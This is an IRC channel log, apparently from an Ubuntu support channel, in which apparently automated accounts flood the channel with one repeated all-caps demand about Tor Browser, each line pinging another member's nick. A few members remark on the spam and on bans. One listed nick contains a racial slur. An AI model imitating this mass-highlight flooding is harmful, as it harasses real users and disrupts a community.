<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: protodan
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: caribou
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: phunyguy
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: M3mphiZ
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lionel
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: bradm_
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: semiosis
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Stern
<molocep> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: moonlight
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ggherdov`
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: galeido
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Pyrrhic
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: iNs
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: frekj
<BARBIE20bm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: j4g0
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ogra_
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: nymony
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jamespage
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: niemeyer
<santapaxt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jell
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: knopwob
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tanuki
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jamespage
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: macskay
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: basilAB
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: din0
<crazylebgou> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: unreal
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Dmitrii-Sh
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: macskay
<crazylebgou> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: azidhaka
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: fidothe
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ra
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Spydar007
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: cybrian_
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: freyes
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: stickystyle
<aprui> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Hirppa
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Typhon
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: #ubuntu-serv
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: funabash1
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: yoink
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ScottE
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: robher
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: techmagus
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: BlackDex
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: armyriad
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rypervenche
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mundus
<kebbanalex_> Multi ban?
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: blake_r
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: galeido
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: soren
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: fhd
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: bruce549
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: hardstowp
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: nwilson5
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Tribaal
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: heistheDude
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mwhudson
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jdstrand
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: stgraber
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Bodenhaltung
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ggherdov`
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lynxman
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tec___
<nacc> genii: they are also doing it via (random) PM, just an FYI
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Bodenhaltung
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: knopwob
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rypervenche
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: yosafbridge
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: k2gremlin
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: edenist_
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Stern
<blizzaqt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lau
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Tahvok
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: xMopxShell
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: DenBeiren
<molocep> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lionel
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: clvx
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: DirtyCajun
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Typhon
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: cagmz_
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: maxb
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Evangeli0pj
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ubottu
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: profall
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: thejoecarroll
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: piremi
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lordievader
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: s0_iggie
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: guideline
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jhenke
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: athaller
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: _KaszpiR_
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: cpaelzer
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: freakyy
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jgornick
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mmm
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: MystaMax
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: niemeyer
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: duckydan
<booteev> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: HollaDolla
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ejat
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: profall
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lynorian
<booteev> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: dlloyd_
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: patdk-wk
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: cybrian_
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: yuitimothy
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tnarg
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Chrisfu-
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: pleia2
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: NegativeFlare
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: NegativeFlare
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: stickystyle
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: MystaMax
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: SpamapS
<blizzaqt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rbasak
<blizzaqt> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: thrillgore
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: T-Co
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: DammitJim
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ubuntulog
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ilmaisin
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Kamilion
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Kamilion
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: robertj
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Adri2000
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jgornick
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: niggasbedumb
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: bvi
<shodan45> wow, that's quite a few nicks
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: patsToms
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Deliant
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: bvi
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mhcerri|mobile
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: galeido
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: sarnold
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: cpaelzer
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: phunyguy
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: bladernr
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: guntbert
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: broder
<molocep> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Nizumzen
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: db`
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Jalen
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: xMopxShell
<aprui> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rmk
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: fhd
<booteev> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ChmEarl
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Beret
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rtjure
<booteev> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ladyciefd
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lau
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: fyxim
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: k2gremlin
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: philroche
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mike-zal
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: iliv
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mtl
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Epx998
<booteev> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rtjure
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jamespage
<booteev> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Foritus
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Mas
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lynxman
<oskfa> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tafa2
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mollerup_
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: dannf
<booteev> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: cydizen
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: GLaDER
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: patdk-wk
<booteev> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: wretchedspirit
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: skeezix-hf
<lobsm> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: sdeziel
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: pleia2
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: heistheDude
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lobsm
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jgornick
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: din0
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mundus
<Evangeli0pj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: AndyWojo
<sadksp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: PityDaFool
<Tribaal> someone's getting kicked
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: droman0
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: glebihan
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Kehet
<cherokto> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: trobotham
<frekj> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: thedac
<ladyciefd> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: robher
<molocep> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: kebbanalex_
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: supercool
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: xit
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: bleepy
<hardstowp> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tec___
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tyhicks
<ircservimc> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: marlinc
<nacc> genii: thaks
<Nizumzen> someone really wants the tor browser
<mike-zal> finally
<icey> there's a channel for that ;-)
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ulkesh
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: pjdc
<duckydan> So, what exactly do people home to gain by doing that kind of stuff?
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: spinza
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: vtapia
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jrahmy
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: smoser
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tec___
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: patsToms
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jrahmy
<mike-zal> if some is able to create a boot/script that spams irc should be able to set tor
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: glebihan
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: CarlenWhite
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: sbeattie
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: spinza
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: sarnold
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: spinza
<lucignoyu> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rsalveti
<mdeslaur> No. Go away.
<Fuchs> that's a bit pointless now
<mike-zal> if some is able to create a boot/script that spams irc should be able to set tor
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: ajmitch_
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Pyrrhic
